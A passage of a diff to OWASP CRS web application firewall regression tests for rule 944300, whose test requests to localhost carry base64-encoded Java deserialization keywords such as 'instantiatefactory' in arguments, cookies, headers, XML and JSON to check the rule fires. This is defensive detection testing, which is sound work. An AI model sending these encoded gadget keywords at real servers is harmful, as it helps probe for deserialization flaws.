"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 125 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 130 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log: + expect_ids: [944300] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 